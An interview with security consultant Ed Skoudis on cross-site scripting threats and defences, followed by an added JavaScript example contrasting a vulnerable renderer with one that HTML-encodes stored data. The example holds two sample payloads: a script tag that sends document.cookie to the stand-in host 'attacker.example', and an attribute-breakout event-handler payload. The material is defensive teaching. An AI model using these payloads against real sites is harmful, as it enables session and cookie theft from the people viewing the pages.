With Ed Skoudis, senior security consultant with International Network Services Inc., a consultancy in Santa Clara, CA. Skoudis’ new book, Malware: Fighting Malicious Code, includes a discussion of cross-site scripting (XSS), an application-level attack in which an attacker plants script in data that an enterprise’s own Web application stores and later displays, so that the script runs in the browsers of the people who view it.
This interview originally appeared in the IT Business Edge weekly report, “Fortifying Network Security.” To see a complete listing of IT Business Edge weekly reports or sign up for this free technology intelligence agent, visit www.itbusinessedge.com.
By Terry Sweeney
Question: Based on the amount of cross-site scripting (XSS) on the Internet in late 2003, what’s your forecast for this sort of online malice for this year?
Skoudis: Enterprises are deploying broken applications and introducing more holes in existing programs much faster than they’re cleaning them up. XSS vulnerabilities are really easy for Web developers to accidentally introduce. However, if they follow some simple recommendations, such as filtering out characters associated with scripting attacks (like =<>"'();&) on both the input and output, we wouldn’t have to face this malice. I always try to be an optimist, but I’m expecting many more of these kinds of attacks in 2004. We might see an increase in 2004 involving paper-based XSS attacks. Although it may sound silly, an attacker could submit a paper-based form to an organization via postal mail. Many companies perform data entry using Optical Character Recognition (OCR). By writing a script into a field on a form and sending it in, the OCR may actually load the script itself into a database. Then, at a later time, an employee of the target company may view the submitted data via a browser. When the script stored in the database reaches the employee’s browser, it can perform some nasty actions on the browser.
Question: How is the average enterprise most likely to be affected by XSS? Stolen passwords, misappropriation of funds, network outages?
Skoudis: Using an XSS attack to submit data to an employee who views the data with a browser would allow the attacker to steal data from that employee’s browser, including cookies. So, a company should analyze what kind of information its users have inside their cookies. What could an attacker do with this data? Does it include personally identifiable information? Do cookies contain account numbers or balances? This data could be exposed to a bad guy via this kind of attack.
Question: What measures should enterprises take to protect themselves against XSS? Where are the security dollars best spent?
Skoudis: They should deploy filters for all incoming and outgoing data in their Web applications. Remove all potential scripts for any data as soon as it arrives or leaves the application. This quick fix is usually very low-cost, provided that the organization has the ability to tweak the code for its Web applications. Additionally, on the client side, make sure your browsers are patched and up to date. Frequently visit www.windowsupdate.com or deploy a thorough patch management solution. By keeping the browsers patched, the worst forms of XSS attacks are far less likely.
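The stored-XSS flow Skoudis describes (a submitted field is loaded into a database and later shown to an employee in a browser) and the two filtering points he recommends, as an added example that is not part of the interview or of his book. It puts a naive renderer beside one that HTML-encodes stored data on output, and shows why the character list in the first answer includes the quote and equals characters and not just angle brackets. The record layout, the attacker host name and the two payloads are constructed for this illustration; the output-encoding step (escaping the five HTML metacharacters rather than deleting them) is the form of "filter on output" a practitioner would normally deploy today, since encoding preserves legitimate data such as names with apostrophes.

```javascript
// Added example (not code from the interview or from Skoudis' book).
// Models: attacker-controlled field -> stored record -> employee's browser.

// Output-side defence: encode the characters that carry meaning in an HTML
// text or attribute context. With these five encoded, the other characters
// the interview lists (= ( ) ;) cannot start script execution in either context.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Input-side defence as stated in the interview: flag a submitted field that
// contains any character associated with scripting attacks.
const SCRIPT_CHARS = /[=<>"'();&]/;
function containsScriptChars(field) {
  return SCRIPT_CHARS.test(field);
}

// A weaker input filter that strips only angle brackets, kept to show what
// the fuller character list catches that this one does not.
function stripAngleBrackets(field) {
  return field.replace(/[<>]/g, "");
}

// Constructed submissions, as an OCR step might load them into a database.
// Payload 1: a script element that ships the viewer's cookies to the attacker.
const SCRIPT_PAYLOAD =
  "<script>new Image().src='http://attacker.example/c?'+document.cookie</script>";
// Payload 2: no angle brackets at all; it breaks out of an attribute value
// and adds an event handler instead.
const ATTRIBUTE_PAYLOAD = '" autofocus onfocus="alert(document.cookie)';

// Vulnerable page: the stored value is concatenated straight into HTML,
// once in a text context and once inside an attribute value.
function renderUnsafe(rec) {
  return `<tr><td>${rec.name}</td><td><input value="${rec.name}"></td></tr>`;
}

// Hardened page: the same template, with the stored value encoded on output.
function renderSafe(rec) {
  const n = escapeHtml(rec.name);
  return `<tr><td>${n}</td><td><input value="${n}"></td></tr>`;
}

// Check used below: did the attacker's string reach the browser unchanged?
function reachesBrowserUnchanged(html, payload) {
  return html.includes(payload);
}

// Count of literal double quotes in the output; the template itself has two,
// so any extra ones mean the attribute context was broken out of.
function countQuotes(html) {
  return (html.match(/"/g) || []).length;
}

// Walk both payloads through both renderers.
function demo() {
  const results = {};
  for (const [label, payload] of [["script", SCRIPT_PAYLOAD], ["attribute", ATTRIBUTE_PAYLOAD]]) {
    const rec = { name: payload };
    results[label] = {
      flaggedOnInput: containsScriptChars(payload),
      survivesAngleBracketStrip: stripAngleBrackets(payload) === payload,
      unsafeLeaksPayload: reachesBrowserUnchanged(renderUnsafe(rec), payload),
      safeLeaksPayload: reachesBrowserUnchanged(renderSafe(rec), payload),
      safeQuoteCount: countQuotes(renderSafe(rec)),
    };
  }
  return results;
}
```

Running demo() shows the attribute payload passing the angle-bracket-only filter untouched while still being caught by the fuller character list, and shows that neither payload reaches the browser intact once the renderer encodes on output.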